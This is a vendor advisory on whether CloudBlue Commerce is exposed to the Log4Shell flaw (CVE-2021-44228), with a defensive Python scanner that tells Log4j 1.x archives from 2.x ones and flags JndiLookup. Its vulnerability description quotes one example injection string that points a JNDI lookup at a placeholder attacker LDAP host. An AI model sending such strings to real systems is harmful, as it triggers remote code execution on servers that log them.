Question


Is CloudBlue Commerce affected by CVE-2021-44228?


General description of the vulnerability


CVE-2021-44228: The Apache Log4j library lets developers log arbitrary data from within their applications, and in many deployments the logged data originates from user input. If that input contains a lookup pattern such as ${jndi:ldap://attacker-host/x} and is logged by a vulnerable Log4j 2 instance, Log4j evaluates the JNDI lookup: it contacts the attacker-controlled LDAP server, which returns a reference to a remote Java class that is then loaded and executed by the application. The result is remote code execution (RCE) on the server running the vulnerable Log4j 2 instance.



Answer


As officially stated by the CloudBlue Application Security team, all supported CloudBlue Commerce versions are not vulnerable to CVE-2021-44228, because:

  1. Log4j 1.x is not affected by CVE-2021-44228 because it does not implement the lookup mechanism that the vulnerability abuses. CloudBlue Commerce platform v20.x and v21.x ship Log4j 1.x in the aps-tools package, which is part of the Branding-UI component. Note that Log4j 1.x is end of life and no longer receives upstream fixes; this statement covers CVE-2021-44228 only.

  2. The Commerce platform also uses WildFly and Elasticsearch, both of which bundle a Log4j package; neither is affected, according to the statements published by their respective vendors.
  3. An updated Log4j library containing the fix is planned to be delivered in the scope of OA-26453.
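To verify on a host which Log4j generation a package actually ships, rather than relying on the version string alone, the check below distinguishes Log4j 1.x jars (package org/apache/log4j/) from Log4j 2.x jars (package org/apache/logging/log4j/) and reports whether a 2.x jar still contains the JndiLookup class that implements the ${jndi:...} lookup described above. This is an added example and not CloudBlue's or Apache's own tooling; the sample archives it builds are constructed placeholders with empty class entries, and the file names and temp-directory prefix are illustrative. It also descends into nested archives, since Log4j is often found inside WEB-INF/lib of a .war rather than as a top-level jar.

```python
"""Added example (not CloudBlue's own tooling): tell Log4j 1.x jars apart from
Log4j 2.x jars and report whether a 2.x jar still ships the JndiLookup class
that implements the ${jndi:...} lookup abused by CVE-2021-44228.
Nested archives (a log4j jar inside WEB-INF/lib of a .war) are also inspected."""
import io
import os
import tempfile
import zipfile

# Package layout differs between the two generations: Log4j 1.x lives under
# org/apache/log4j/, Log4j 2.x under org/apache/logging/log4j/. Only 2.x has
# the JndiLookup class (the one the "remove the class" mitigation deletes).
LOG4J1_MARKER = "org/apache/log4j/Logger.class"
LOG4J2_PREFIX = "org/apache/logging/log4j/"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear")

# Verdicts ordered worst first, so a container holding several jars is
# reported with the most concerning finding among them.
VERDICTS = ["log4j-2.x-jndi-present", "log4j-2.x-jndi-absent", "log4j-1.x", "no-log4j"]


def _classify_zip(zf):
    names = zf.namelist()
    found = set()
    if JNDI_LOOKUP in names:
        found.add("log4j-2.x-jndi-present")
    elif any(n.startswith(LOG4J2_PREFIX) for n in names):
        found.add("log4j-2.x-jndi-absent")
    if LOG4J1_MARKER in names:
        found.add("log4j-1.x")
    # Recurse into nested archives (e.g. WEB-INF/lib/log4j-core-*.jar).
    for n in names:
        if n.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(n))) as inner:
                    found.add(_classify_zip(inner))
            except zipfile.BadZipFile:
                continue
    for v in VERDICTS:
        if v in found:
            return v
    return "no-log4j"


def classify_archive(path):
    """Return the worst verdict from VERDICTS for one archive, or 'unreadable'."""
    try:
        with zipfile.ZipFile(path) as zf:
            return _classify_zip(zf)
    except (zipfile.BadZipFile, OSError):
        return "unreadable"


def scan_tree(root):
    """Walk root and classify every .jar/.war/.ear found; returns {path: verdict}."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                p = os.path.join(dirpath, f)
                results[p] = classify_archive(p)
    return results


def _write_zip(path, entries):
    # Entry bodies are empty placeholders; only the entry names matter here.
    with zipfile.ZipFile(path, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)


def demo():
    """Build constructed sample archives (not real Log4j builds) in a temp dir
    and return {file name: verdict} so the classifier can be exercised offline."""
    root = tempfile.mkdtemp(prefix="log4j-check-")  # illustrative prefix
    samples = {
        "log4j-1.2.17.jar": {LOG4J1_MARKER: b""},
        "log4j-core-2.14.1.jar": {JNDI_LOOKUP: b"", LOG4J2_PREFIX + "core/Core.class": b""},
        "log4j-core-2.14.1-patched.jar": {LOG4J2_PREFIX + "core/Core.class": b""},
        "other-lib.jar": {"com/example/Foo.class": b""},
    }
    for name, entries in samples.items():
        _write_zip(os.path.join(root, name), entries)
    # A .war that embeds the unpatched core jar under WEB-INF/lib.
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_LOOKUP, b"")
    _write_zip(os.path.join(root, "app.war"),
               {"WEB-INF/lib/log4j-core-2.14.1.jar": inner.getvalue()})
    with open(os.path.join(root, "corrupt.jar"), "wb") as fh:
        fh.write(b"not a zip")  # exercises the 'unreadable' path
    return {os.path.basename(p): v for p, v in scan_tree(root).items()}


if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{verdict:26s} {name}")
```

Point scan_tree at the installation root of the component you are checking (for example the directory holding the aps-tools package, or the WildFly and Elasticsearch installation directories) and treat any "log4j-2.x-jndi-present" verdict as requiring follow-up; a "log4j-1.x" verdict is consistent with the statement above, and an "unreadable" verdict means the archive should be inspected by hand rather than assumed clean.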